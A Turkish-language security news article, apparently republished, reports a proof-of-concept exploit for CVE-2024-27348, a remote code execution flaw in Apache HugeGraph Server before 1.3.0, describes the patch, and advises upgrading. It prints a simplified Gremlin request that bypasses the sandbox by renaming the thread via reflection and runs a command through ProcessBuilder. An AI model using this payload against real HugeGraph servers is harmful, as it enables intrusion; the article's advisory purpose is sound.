PoC İstismarının Önem Derecesi Apache HugeGraph RCE kusuru nedeniyle Yayınlandı

   Haziran 7, 2024  Posted in CyberSecurityNews


Yüksek Önem Düzeyindeki Apache HugeGraph RCE kusuru için PoC Açıklarından Yararlanma Yayınlandı

Apache HugeGraph Sunucusunda yüksek önem derecesine sahip Uzaktan Kod Yürütme (RCE) güvenlik açığı için bir kavram kanıtlama (PoC) istismarı yayımlandı.

CVE-2024-27348 olarak tanımlanan bu güvenlik açığı, HugeGraph Server’ın 1.3.0’dan önceki sürümlerini etkiliyor ve kritik niteliğini gösteren 9,8 CVSS puanına sahip.

Apache HugeGraph nedir?

Apache HugeGraph, büyük ölçekli grafik verilerini ve karmaşık sorguları yüksek performansla işlemek için tasarlanmış açık kaynaklı bir grafik veritabanıdır.

Baidu tarafından geliştirilen HugeGraph, Gremlin, Cypher ve SPARQL dahil olmak üzere çeşitli veri modellerini ve sorgulama dillerini destekler.

Büyük veri kümelerini ve karmaşık sorguları yönetmede mevcut grafik veritabanlarının sınırlamalarını gidermek için oluşturuldu. Piyasaya sürülmesinden bu yana performansı ve esnekliği önemli ölçüde ilgi gördü.

CVE-2024-27348, saldırganların sanal alan kısıtlamalarını atlamasına ve Apache TinkerPop projesinin ayrılmaz bir parçası olan bir grafik geçiş dili olan Gremlin aracılığıyla uzaktan kod yürütmesine olanak tanıyan ciddi bir RCE güvenlik açığıdır.

Bu güvenlik açığı, saldırganların sunucu üzerinde tam kontrol sahibi olmasını sağlayarak HugeGraph’ın etkilenen sürümlerini kullanan kuruluşlar için önemli bir tehdit oluşturuyor.

Analyze any MaliciousURL, Files & Emails & Configuration With ANY RUN Start your Analysis

Bu güvenlik açığına yönelik düzeltme eki, güvenliği artırmaya yönelik birkaç kritik değişiklik içerir. Aşağıdaki dosyalarda önemli değişiklikler yapıldı:

  • Giriş API’si.java: Oturum kapatma yöntemi için bir yetkilendirme belirteci gerektiren ve belirtecin boş veya boş olmamasını sağlayan @HeaderParam ek açıklamasının eklenmesiyle kimlik doğrulama/yetkilendirme işleminde yapılan iyileştirmeler.
  • HugeFactoryAuthProxy.java: Güvenlik açığının temel nedenini ortadan kaldırarak kritik sistem sınıflarını filtrelemek için filterCriticalSystemClasses işlevinin tanıtılması.
  • HugeSecurityManager.java: Hassas sınıflara yetkisiz yansıtıcı erişimi önlemek için checkMemberAccess ve isteğe bağlıMethodsToFilter gibi yöntemlerin eklenmesi.

Kullanım ve Analiz

PoC istismarı, bir saldırganın SecurityManager’ın eksik yansıma filtrelemesinden yararlanarak güvenlik önlemlerini nasıl atlayabileceğini gösteriyor.

Bu istismar, güvenlik kontrollerini atlamak için mevcut iş parçacığının adını değiştirmeyi ve komutları yürütmek için ProcessBuilder sınıfını kullanmayı içerir.

İşte yararlanma kodunun basitleştirilmiş bir versiyonu:

{

    "gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"mkdir\", \"/tmp/SecureLayer7\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",

    "bindings": {},

    "language": "gremlin-groovy",

    "aliases": {}

}

Bu kod, iş parçacığı adını “SL7” olarak değiştirir ve güvenlik kontrollerini atlayarak bir dizin oluşturmak için ProcessBuilder’ı kullanır.

Komutumuzu yürütmek ve dizini oluşturmak için start yöntemini çağırın
Komutumuzu yürütmek ve dizini oluşturmak için start yöntemini çağırın

CVE-2024-27348 için PoC istismarının yayınlanması, Apache HugeGraph’taki bu güvenlik açığının kritik yapısını vurgulamaktadır.

HugeGraph’ın etkilenen sürümlerini kullanan kuruluşların, riski azaltmak için 1.3.0 veya daha yeni bir sürüme güncelleme yapması önemle tavsiye edilir.

Bu olay, olası güvenlik açıklarına karşı koruma sağlamak için sağlam güvenlik önlemlerinin ve zamanında yama uygulamasının öneminin altını çiziyor.

Siber güvenlik ortamı geliştikçe, güvenlik açıkları ve bunların hafifletilmesi hakkında bilgi sahibi olmak, sistemlerin ve verilerin güvenliğini ve bütünlüğünü korumak açısından çok önemlidir.

Topluluğun bu güvenlik açığına hızlı tepki vermesi, bu tür yüksek önemdeki tehditleri etkili bir şekilde ele almak ve azaltmak için gereken işbirlikçi çabayı göstermektedir.

Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs: Try Free Demo 



Source link